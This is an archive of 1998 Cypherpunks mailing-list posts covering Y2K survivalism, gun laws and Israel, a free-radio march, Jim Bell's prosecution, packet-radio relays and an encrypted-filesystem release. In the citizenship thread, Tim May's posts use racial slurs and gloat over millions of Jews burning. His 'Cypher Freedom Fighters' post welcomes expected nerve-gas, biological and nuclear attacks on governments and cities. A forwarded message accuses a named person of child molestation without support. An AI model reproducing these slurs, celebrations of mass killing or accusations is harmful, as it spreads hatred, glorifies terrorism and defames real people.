In-Reply-To: <199809080235.TAA23415@netcom13.netcom.com>
Message-ID: <35F56F1A.652C@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Scott has decided
> that the only real fix for the Y2K problem may be to pack up and move to
> this patch of land 75 miles from his San Diego home. "In the next year or
> so," he predicts, "the most common cocktail party chatter will be, 'What
> are you doing to prepare for Y2K?' But by then, it will be too late."
> 
Water? Met a reactor designer from Los Alamos once who lived in some
super but isolated place in the Sangre De Christos. He had to drill some
3K ft for water. VERY EXPENSIVE. Ever seen the Peoples Broadcasting
Service piece about the "Cadillac Desert"? Water is just another utility
here. All automated.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 02:44:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03130303b21b0886ab43@[209.66.100.138]>
Message-ID: <v03130306b21b29f68511@[209.66.100.138]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:19 AM -0700 9/8/98, William H. Geiger III wrote:

>Yes Tim, we all know your anti-Israel position and your sympathy for the
>Palistinians even though they are in the position that they are due to
>their own actions.
>
>They started the war, got their asses beat and have been whining about it
>for the past 50 years.

We'll see who's whining after 2 million Zionists are consumed in the holy
fire that sweeps through Haifa and Tel Aviv.

Some Jews learned nothing from WWII.

Ironic that our Cypherpunks technology, including remailers, will help the
forces of liberation coordinate their attacks. On this point, Freeh and
Reno are completely correct, as I have been saying for years.


--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: your name <your.name@pcm.bosch.de>
Date: Tue, 8 Sep 1998 17:59:23 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809080955.LAA16121@frnext1a.fr.bosch.de>
MIME-Version: 1.0
Content-Type: text/plain



Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.01 [de]C-NSCP  (WinNT; I)
Remedy=Tell the world




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 02:21:14 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03130303b21b0886ab43@[209.66.100.138]>
Message-ID: <199809081814.OAA17367@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03130303b21b0886ab43@[209.66.100.138]>, on 09/08/98 
   at 09:24 AM, Tim May <tcmay@got.net> said:

>>
>>Does anyone know of any countries with more reasonable gun laws than the
>>US?  I vaguely think Israel and Switzerland are better, at least for citizens.
>>It is one of the major problems I have with Anguilla -- "guns are bad".
>>I miss my M1A.

>Don't automatically assume Israel is good for gun ownership. If you're an
>untermenschen, a schwarzen, a sand nigger, an Arab, you can't legally own
>a gun. Unless you're one of the Trustees, i.e., a deputized member of the
>PLO's military or police.

>The Chosen People are of course encouraged to have fully automatic
>weapons.

Yes Tim, we all know your anti-Israel position and your sympathy for the
Palistinians even though they are in the position that they are due to
their own actions.

They started the war, got their asses beat and have been whining about it
for the past 50 years.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2...Opens up Windows, shuts up Gates.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfV1+o9Co1n+aLhhAQFYJQP+NKcHhRntStmWAukv9QuQ6rgoTrGihLjX
MEHt9qxFtKbgFhtEMVBG6NufK/CxjPcKUj0RJpr2PTOTF2NQFsNRLP66lYk+FRRm
RbLhXl3BixMZZyMNVDzCiG9cnlyHEWtKZMcUn8m3Kse7p91V+9Ld9KE/ZkJb5hyG
xvvzah0MjTY=
=+X7j
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 9 Sep 1998 04:35:06 +0800
To: cypherpunks@cyberpass.net
Subject: (Fwd) Radio Activists March on DC, Oct 4 & 5
Message-ID: <199809082033.NAA28205@bsd.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message Follows -------
Date:          Mon, 7 Sep 1998 06:48:58 -0700 (PDT)
From:          gregruggiero@earthlink.net (New York Free Media Alliance)
Subject:       Radio Activists March on DC, Oct 4 & 5
To:            iaj-futuremedia@igc.org

Dear Supporters of Community Media and Free Speech,

You may be aware that the Federal Communications Commission
has recently intensified it's assault on unlicensed micropower
radio stations.  In response to this campaign and the government's
longstanding ban on low-power radio, a national movement has emerged
to proliferate microbroadcasting, and win constitutional protection to
broadcast at the community level.

We invite you to  show your support for
community access to the airwaves. Join us in Washington, DC
on Sunday, October 4  for a micropower radio conference,
and on Monday October 5 for a march on FCC and  NAB headquarters.

Workshops & information will be offered on how to start a radio
station and acquire the necessary equipment.

Please pass this on to people who might be interested, especially
those who don't have access to the internet.

See you in Washington.

Thanks,

Greg Ruggiero
New York Free Media Alliance
http://artcon.rutgers.edu/papertiger/nyfma/

"Where there is even a pretense of democracy, communications are at
its heart." --Noam Chomsky


--------------------------------------------

SHOWDOWN AT THE FCC!

 FREE RADIO ACTIVISTS MARCH ON WASHINGTON TO
 CONFRONT THE GLOBAL  MEDIA MONOPOLY AND
THEIR MARIONETTES IN GOVERNMENT!

Sunday, October 4, 1998
Monday, October 5, 1998
Washington, DC

Calling all media activists, microbroadcasters and people for a
democratic media:

 Come to DC for the first national mobilization for free radio.
 Microbroadcasters from around the country will gather for
 two days to share radio skills, organize alliances, speak out
 to the media and protest at the FCC and NAB buildings,
 culminating in a live broadcast straight into the offices of the
people working so hard to shut us down. Free Radio Berkeley, Radio
Mutiny, Steal This Radio and other microstations have all broadcast
live in public and challenged the FCC to shut them down in the light
of day, in front of the press and the Feds have never dared to show
their face- this time, we're going to take it right to their doorstep
and tell them that if they're so sure that their dumb law is worth
enforcing, then the Chairman should come down from the 8th floor and
put the cuffs on us himself.

There will also be workshops to help new folks start
stations, appointments will be made to lobby congress
people, and press events will be held to show the true,
diverse face of the microbroadcasting movement.

Schedule

                       Sunday,
                       10-12 workshops (to be announced)
                       12-1 lunch
                       1-3 workshops (to be announced)
                       3-5 speakout
                       5-6:30 dinner
                       7pm party/puppet making for demonstration
  Monday

 10:30 am MARCH AND PUPPET PARADE
  starts at Dupont Circle, goes to the Federal
 Communications Commission building, and then marches
on to confront the National Association of Broadcasters.
During these protests, we will flip the giant free speech
switches, turn on our transmitters and strike a blow against
the meta-marionettes: A giant puppet of General Electric
and Corporate America, which will in turn control a slightly
smaller puppet of the National Association of Broadcasters,
which in turn will operate a smaller puppet of the FCC,
which in turn will be trying to stamp out microbroadcasters
and our free speech rights. These demonstrations will also
include a number of sneaky surprises that are so cool that
we can't even mention them here!

1:30pm

meetings set up with people's congressional
representatives for lobbying

4pm press event:

What Can a Black Panther, a Free Market Think Tank
Policy Analyst, an Anarchist Feminist,   A Radio Engineer,
A Public Health Worker and a Discount
Store Owner Agree Upon? IT'S TIME TO LEGALIZE
MICROBROADCASTING!

 So what's YOUR excuse not to come to the most
excellent weekend of mayhem ever? Nothing. Then good-
we'll see you there.

Bring a sleeping bag, cameras and recording devices,
vehicles, some money to help this all come off, questions
for the experts on pirate station operations, puppet
materials, signs and banners, transmitters, AND ALL OF
YOUR FRIENDS!

contact info:
email: petetridish@hotmail.com
phone:Pete tri Dish 215-474-6459 or
          Amanda at   202-518-5644
                       p.o.box 179,
                       College Park, MD 20741-0179

**************************************************

                                             NEW YORK
Media for Change           <<< FREE MEDIA >>>     Changing the Media
                                              ALLIANCE

                             listserve: nyfreemedia@tao.ca
                               voicemail: (212) 969-8636
           website: http://artcon.rutgers.edu/papertiger/nyfma

**************************************************



=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://ross.adnetsol.com
Voice: (408) 259-2795




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Wed, 9 Sep 1998 04:02:53 +0800
To: zooko@xs4all.nl>
Subject: RE: Zooko on JYA, cpunks, and surveillance (was: Re: Can't tell the kooks without a scorecard? Re: Monkey Wrenching the Echelon Engine)
Message-ID: <2C396693FBDED111AEF60000F84104A721BFA5@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



Zane Lewkowicz writes:
>As far as i can tell, only people who 
>threaten feds with physical danger are getting busted.  
>Threatening feds with the possibility of a future society in 
>which their roles are obviated apparently doesn't work. 

This matches what I've seen.  Mr. Bell made the big mistake of directly
attacking the IRS (the mercaptan [sp?] attack).  I've had some dealings with
local government people on real estate issues (who have generally been
reasonably helpful), and the set of people who like practical jokes has a
(nearly?) null intersection with the set of people who go into government
service.  Especially when you do something to send people to the doctor
because of chemical-induced vomiting...

If Tim May gets picked up, I expect it to be a result of a Chinese Cultural
Revolution-type action (all intellectuals, all programmers, all engineers,
etc.).  As long as Tim isn't entrapped, he is probably pretty safe from
being picked up.  However, there's going to be a lot of changes in the near
future (e$, Y2K, Internet fall-out, biochemoelectronics, etc.), so I advise
that everyone batten down the hatches -- we're in for a stormy ride into a
[likely] glorious future.
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@systemics.ai>
Date: Wed, 9 Sep 1998 02:37:16 +0800
To: cypherpunks@Algebra.COM
Subject: radio net
Message-ID: <E0zGSWY-0002wH-00@arianrhod.systemics.ai>
MIME-Version: 1.0
Content-Type: text/plain



Is anyone else interested in setting up a radio net (probably packet radio
relay) to relay small quantities of data in the event the telecommunications
infrastructure becomes unavailable (either technically or legally/politically/
militarily)?  There are existing packet relay nets, but in my experience
amateur radio people, especially in the US, are very willing to roll over
for the government at the slightest cause.

I think the cost would be something like $1-5k per station, and it could
be done in a fairly turnkey fashion.  Exactly how to handle routing and
what protocol to use on the network is kind of an open question -- there
are a lot of solutions, none of them optimal.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 05:35:36 +0800
To: cypherpunks@Algebra.COM
Subject: Cypher Freedom Fighters
In-Reply-To: <2C396693FBDED111AEF60000F84104A721BFA5@indyexch_fddi.indy.tce.com>
Message-ID: <v03130307b21b4f0b3a10@[209.66.100.138]>
MIME-Version: 1.0
Content-Type: text/plain



(I've changed the thread title to something simple, replacing the "RE:
Zooko on JYA, cpunks, and surveillance (was: Re: Can't tell the kooks
without a scorecard? Re: Monkey Wrenching the Echelon Engine)" title.)


At 11:56 AM -0700 9/8/98, Fisher Mark wrote:
>Zane Lewkowicz writes:
>>As far as i can tell, only people who
>>threaten feds with physical danger are getting busted.
>>Threatening feds with the possibility of a future society in
>>which their roles are obviated apparently doesn't work.
>
>This matches what I've seen.  Mr. Bell made the big mistake of directly
>attacking the IRS (the mercaptan [sp?] attack).  I've had some dealings with
>local government people on real estate issues (who have generally been
>reasonably helpful), and the set of people who like practical jokes has a
>(nearly?) null intersection with the set of people who go into government
>service.  Especially when you do something to send people to the doctor
>because of chemical-induced vomiting...

Ditto in spade for me. To wit, if I caught someone dumping mercaptin under
my door I'd likely be so enraged I'd empty a clip into him right then and
there...and I'd consider myself justified.

Bell "crossed the line" into committing prosecutable offenses in more than
just the alleged mercaptin attack. There was also the matter of working
under multiple faked Social Security numbers.

(No, I'm not saying this was immoral. Just illegal. And those who do the
crime should not be surprised to have to do the time.)

The issue of whether he threatened IRS officials at their home by having
their home addresses is unproven to me. Compiling such lists is perfectly
legal.

The metal chaff he supposedly wanted to drop down an IRS building
airshaft...well, it seems unworkable.

And, as many of us have noted, their is zero chance a working AP system was
deployed, absent several of the building blocks. So AP could not in itself
have been a threat.

But clearly his AP literature aroused much interest by various arms of law
enforcement. And once arouse, they pretty much had to find something to get
him on. His earlier conviction or plea on chemical and/or drug charges
meant they were looking for chemicals. And they found them.

Plus, recall that Bell bragged to his friends that he'd gotten revenge
against a lawyer he didn't like, and against the IRS.


>If Tim May gets picked up, I expect it to be a result of a Chinese Cultural
>Revolution-type action (all intellectuals, all programmers, all engineers,
>etc.).  As long as Tim isn't entrapped, he is probably pretty safe from
>being picked up.  However, there's going to be a lot of changes in the near
>future (e$, Y2K, Internet fall-out, biochemoelectronics, etc.), so I advise
>that everyone batten down the hatches -- we're in for a stormy ride into a
>[likely] glorious future.

I don't hide my political views, nor my support of various interesting
technologies. My actions are fully protected by the Bill of Rights, even if
various unconstitutional restrictions on mys speech and funding habits have
been recently passed.

I expect the chickens to come home to roost...meaning, some nerve gas or
biological attacks on government, the nuking of at least one major city,
and possibly the driving of the Zionists into the sea (figuratively
speaking, as more literally they'll probably be hacked to death by Arabs,
gassed by neighboring states, and possibly incinerated with ex-Soviet
nukes).

Chickens coming home to roost. The patriot movement in the U.S. is gaining
strength every day, though it is going to ground. (Which makes strong
crypto tools much more interesting and important to them.) I expect they
may strike at various targets as Y2K unfolds.

It is a glorious thing for our technologies to be spreading into the hands
of those who can do so much.

--Tim May


"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 03:22:45 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Best & Brightest
Message-ID: <199809081935.OAA10317@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Sorry it took so long to get back on this, but...

I went and checked the book in the bookstore as I had a vague memory of
reading it in high school. Yep, it's the same book I read in '74 in a
government class.

David Halberstam's "Best and Brightest" was an excellent book on the Vietnam
War and the political wrangling that got us into it - *for 1972*.

This book has never been updated and near as I can find nobody has taken the
time to compare its line of argument and innuendo with the last 26 years of
data that has come to light. In particular it makes no mention, and because
of time travel limitations shouldn't be expected to, of the wealth of data
on the Cuban Missile Crisis and the Vietnam Conflict that has come to light
in the last 3 years because these classified materials weren't released yet.
This material is available via the Kennedy Library and the LBJ Library. It
includes internal memos and similar material that Halberstam did not have
any knowledge of. Of paritcular note to the thesis that some espouse that
Kennedy intended to increase the force level is a memo to the combined
chiefs of staff to remove ALL US forces from SE Asia. This memo was signed
just weeks before Kennedy was assassinated. Every indication is that LBJ
would have honored that had the Ya Drang Valley (the 7th Cavalry almost had
another Little Bighorn) not occurred in '64. After this tactical defeat (both
US and Viet forces claimed it as a strategic win) the US level of forces in
the area went through the roof.

This book is good for a historical perspective only, if you're interested
in understanding what happened from 1962 - 1963 with Kennedy and 1963+ with
LBJ then this is not the book to go to. It is simply out of date.

A general rule of thumb in doing historical research:

If the reference is not a primary and it is over 5 years old and has not
been updated then it is suspect.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Tue, 8 Sep 1998 22:39:34 +0800
Subject: Re: A question about gas warfare in San Fran in '66...
In-Reply-To: <199809080109.UAA06813@einstein.ssz.com>
Message-ID: <35F5411A.A846BB4C@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Hi,
> 
> Here in Austin we have a local radio dj who does a public access show on
> various issue localy and nationaly, Alex Jones, who has put a piece on some
> sort of bio-weapon test that occurred in '66 in San Francisco. He is
> claiming that deaths resulted.
> 
> Anyone have a clue what he's talking about?

As far as I know, the only bio-weapon test that occured in San Francisco
was when they scattered some large volume of apparently harmless
bacteria over the city in order to find out what effect a bio-attack
would have on them, and to get an idea of what countermeasures are
useful, and of course, to test their own delivery systems. :)

I don't know what kind of bacteria they were, so I've no idea if they
were harmless or not.  Suffice to say that a bunch of people in San
Francisco think they weren't (harmless), and get upset about it
frequently.

It seems unlikely, however, that the few deaths that people have tried
to attribute to the bacteria were actually caused by them.  San
Francisco is a big city, with lots of people.  If the bacteria really
were dangerous, *manY* people would have died, rather than the handful
(10-15?) that did in fact die, for one reason or another.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 06:36:25 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03130306b21b29f68511@[209.66.100.138]>
Message-ID: <199809082230.SAA21185@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03130306b21b29f68511@[209.66.100.138]>, on 09/08/98 
   at 11:41 AM, Tim May <tcmay@got.net> said:

>>Yes Tim, we all know your anti-Israel position and your sympathy for the
>>Palistinians even though they are in the position that they are due to
>>their own actions.
>>
>>They started the war, got their asses beat and have been whining about it
>>for the past 50 years.

>We'll see who's whining after 2 million Zionists are consumed in the holy
>fire that sweeps through Haifa and Tel Aviv.

While you may gleefully look forward to such a day, need I remind you that
it will be more than the Jews that go up in flames. Israel has a nice
little stockpile of weapons and are not shy about using them. Any major
attack against Israel is liable to cause the entire Middle East turned
into one large glass bowl.

More than likely Israel will make use of a pre-emptive strike before
anyone gets close to finishing their weapons let alone launching them (I
was there when Israel launched their attack against the Iraq Breeder
Reactor the French were so kind to build for them).

>Some Jews learned nothing from WWII.

Actually they learned quite a bit. They will *never* be herded into cattle
cars and shipped off to the gas chambers again. They may eventually fall
to the forces of darkness but they will do so fighting.

>Ironic that our Cypherpunks technology, including remailers, will help
>the forces of liberation coordinate their attacks. On this point, Freeh
>and Reno are completely correct, as I have been saying for years.

forces of liberation? Lets see, Jews emigrate to Trans-Jordan, *buy* land
from the arabs living there, and live peaceably. The British decide to
divide up this area between Jordan, Palestine, and Israel. The Grand Mufti
declares a "holy war" against the Jews in which the Palestinians and
several neighboring countries join. The Arabs loose, the Jews win. They
continue this war for the next 50 years with various periods of
cease-fire. Every time they loose.

What the Arabs have attempted to do is finish the job the Nazi's started.
Only the Jews are not going to go down without a fight. The continuing
conflict in the Middle East has not been a battle of liberation but a war
of ethnic cleansing and extermination against the Jews.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: One man's Windows are another man's walls.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfWx2I9Co1n+aLhhAQFfswP+LOQ1zJfGKfIoIO1AcKpWumaMSoO9xheA
dY40gRUN8QDhhMqBMND7vGnU2UMDZ2yQXoGjIPl1W/NgevZdFcVrj195Hb1XCO7b
7+lxbO670vFeA40NCGs3JqnNk2KpzyCSLl9QJRlxd7a/yxseJ0Lei8KEXbJ5E/SV
C96AeJpygTU=
=far2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 03:53:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: radio net (fwd)
Message-ID: <199809082004.PAA10445@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: radio net
> Date: Tue, 08 Sep 1998 14:29:53 -0400
> From: Ryan Lackey <ryan@systemics.ai>

> Is anyone else interested in setting up a radio net (probably packet radio
> relay) to relay small quantities of data in the event the telecommunications
> infrastructure becomes unavailable (either technically or legally/politically/
> militarily)?  There are existing packet relay nets, but in my experience
> amateur radio people, especially in the US, are very willing to roll over
> for the government at the slightest cause.
> 
> I think the cost would be something like $1-5k per station, and it could
> be done in a fairly turnkey fashion.  Exactly how to handle routing and
> what protocol to use on the network is kind of an open question -- there
> are a lot of solutions, none of them optimal.

What sort of use do you see it being put to? One or two stations wouldn't be
worth the investment in money or time. Would it be some sort of private
channel or the backbone of a more complex enterprise? Do you see it being a
form of employment in the crash in that the operator could trade
communications access for vittles and ammo?

As to protocols, the standard IP packet software seems to work just fine (I
think it's something like KA9Q or some such). I've used it twice and it
worked like a champ.

Are you proposing to get a license or would it be strictly underground until
after the crash?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Wed, 9 Sep 1998 06:56:14 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.5.32.19980908153726.00816100@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



	
	
When the American government eventually reveals the [full range of]
reconnaissance systems developed by this nation, the public will learn of
space achievements every bit as impressive as the Apollo Moon landings.




http://www.nro.odci.gov/speeches/grab-698.html

Prepared Remarks at the Naval Research Laboratory 75th Anniversary Event 

By Mr. Keith Hall, Director of the National Reconnaissance Office

17 June 1998 






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cicho@free.polbox.pl (cicho)
Date: Tue, 8 Sep 1998 23:55:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: wired on y2k
In-Reply-To: <199809080235.TAA23415@netcom13.netcom.com>
Message-ID: <35f55163.1411866@193.59.1.1>
MIME-Version: 1.0
Content-Type: text/plain



I read this piece in the print edition and wondered...
>F E A T U R E|Issue 6.08 - August 1998 
>The Y2K Solution: Run for Your Life!! 
> By Kevin Poulsen 

Not *the* Kevin Poulsen, is it?

('the', as in http://www.well.com/user/fine/journalism/jail.html
or http://www.catalog.com/kevin/scales.html)

.marek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@MIT.EDU>
Date: Wed, 9 Sep 1998 04:19:49 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
Message-ID: <tw7lnnu747f.fsf@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> let us know if you find any places in the caribbean [which allow
> sheeple to have real guns]

AFAIK, none, unless you include "people who bribe the government of
some of these countries" as "sheeple".  International waters might work,
if you can find a flag which allows you to keep weapons on your ship,
which AFAIK is rare these days.  Some of the independent non-BDTs
like St. Kitts and Nevis, Antigua, etc. might be better for this than
Anguilla.

Anguilla has the benefit of being small and stable, such that you're less
likely to need a gun.  I seriously doubt if the 60 police officers on
Anguilla could be organized to do a Waco-style offensive in any case.
This isn't an ideal situation, but is pretty reasonable for now.

Israel is *definitely* not on my "list of places I'd go to avoid trouble",
no matter what kind of weaponry I were permitted by virtue of being
non-Arab and Western.  Tel Aviv being a political target for the 
Palestians, Jerusalem being a target with definite style points for
others, and Armageddon having additional style points for the first
private nuclear detonation -- three targets in one tiny country, oh joy.
I'd feel safer in Washington DC.

-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: demona@demona.doldrums.dyn.ml.org
Date: Wed, 9 Sep 1998 09:46:09 +0800
To: cypherpunks@Algebra.COM
Subject: (fwd) ppdd - encrypted filesystem - kernel patch and support progs.
Message-ID: <199809082143.RAA01758@demona.doldrums.dyn.ml.org>
MIME-Version: 1.0
Content-Type: text/plain



-- forwarded message --
Path: nntp.net-link.net!ptdnetP!newsgate.ptd.net!newsfeed.fast.net!howland.erols.net!newsfeed1.telenordia.se!newsfeed1.funet.fi!news.helsinki.fi!not-for-mail
From: Allan Latham <alatham@ibm.net>
Newsgroups: comp.os.linux.announce
Subject: ppdd - encrypted filesystem - kernel patch and support progs.
Followup-To: comp.os.linux.misc
Date: Tue,  8 Sep 1998 08:38:12 GMT
Organization: Flexsys
Lines: 48
Approved: linux-announce@news.ornl.gov (Mikko Rauhala)
Message-ID: <pycola.905243893.18924@laulujoutsen.pc.helsinki.fi>
Reply-To: alatham@flexsys-group.com
NNTP-Posting-Host: laulujoutsen.pc.helsinki.fi
Old-Date: Sat, 05 Sep 1998 14:43:19 +0200
X-No-Archive: yes
X-Auth: PGPMoose V1.1 PGP comp.os.linux.announce
	iQCVAgUBNfTs+lrUI/eHXJZ5AQEL7QQAm4TJb/hig4GSK4jpwd2PhuA8IKynybEF
	L+5ki9aYooX3Je/LdyvHVeg9kFL0IM8qdYNK01W6jJDqscoM4Hlp8KstxmpIDn1v
	OTBF9AbX4HQKUKO3J1UcNn+J89WZN/lmSB9lcgnJ6YAaKWpAYPVUFaoOoTPgHTg4
	ITpeWxe/v9s=
	=w014
Xref: nntp.net-link.net comp.os.linux.announce:1426

-----BEGIN PGP SIGNED MESSAGE-----


ppdd is an advanced encrypted file system for i386 Linux only.

It is used in a similar way to the loop device and offers simplicity and
speed plus full strength encryption (128 bit).

The design takes into consideration the fact that data on disc has a
long lifetime and that an attacker may have the matching plaintext to
much of the cyphertext.

A combination of master/working pass phrases offers enhanced security
for backup copies.

Current status is BETA and comments on the
implemenation and underlying crypography are most welcome.

It consists of a kernel patch plus support programs and is intended
for users with enough knowledge to compile the kernel, setup lilo,
partition disks etc. It is not for absolute beginners or "non technical"
users just yet.

Available from: http://pweb.de.uu.net/flexsys.mtk

Package is ppdd-0.4.tgz, pgp signature is also available from same url.

Allan Latham <alatham@flexsys-group.com>



- -- 
This article has been digitally signed by the moderator, using PGP.
http://www.iki.fi/mjr/cola-public-key.asc has PGP key for validating signature.
Send submissions for comp.os.linux.announce to: linux-announce@news.ornl.gov
PLEASE remember a short description of the software and the LOCATION.
This group is archived at http://www.iki.fi/mjr/linux/cola.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQCVAgUBNfTs+lrUI/eHXJZ5AQEWhQP9Fd7tlWEZs/jG5Kcq/foSJBW6Me/WXS1W
wRgKukImIl/DstOW9Ni1ZhfEoT4xwp0fpnVPdl+5aPG76thLv/T4iVRwVwh47hem
y34x3IbvKnX6jvOqONEvrYbGL3CreMd1QWq3YuXUTZUVJVZVb6nSL4Wh5vKt/0na
ijokp4QDMDk=
=K4sO
-----END PGP SIGNATURE-----
-- end of forwarded message --




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 06:55:41 +0800
To: "William H. Geiger III" <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03130303b21b0886ab43@[209.66.100.138]>
Message-ID: <v0311070eb21b6226b742@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:19 PM -0500 9/8/98, William H. Geiger III wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In <v03130303b21b0886ab43@[209.66.100.138]>, on 09/08/98
>   at 09:24 AM, Tim May <tcmay@got.net> said:
>
>>>
>>>Does anyone know of any countries with more reasonable gun laws than the
>>>US?  I vaguely think Israel and Switzerland are better, at least for
>>>citizens.
>>>It is one of the major problems I have with Anguilla -- "guns are bad".
>>>I miss my M1A.
>
>>Don't automatically assume Israel is good for gun ownership. If you're an
>>untermenschen, a schwarzen, a sand nigger, an Arab, you can't legally own
>>a gun. Unless you're one of the Trustees, i.e., a deputized member of the
>>PLO's military or police.
>
>>The Chosen People are of course encouraged to have fully automatic
>>weapons.
>
>Yes Tim, we all know your anti-Israel position and your sympathy for the
>Palistinians even though they are in the position that they are due to
>their own actions.
>
>They started the war, got their asses beat and have been whining about it
>for the past 50 years.

	Crap, the U.N. (what was that about "United?") started the shit
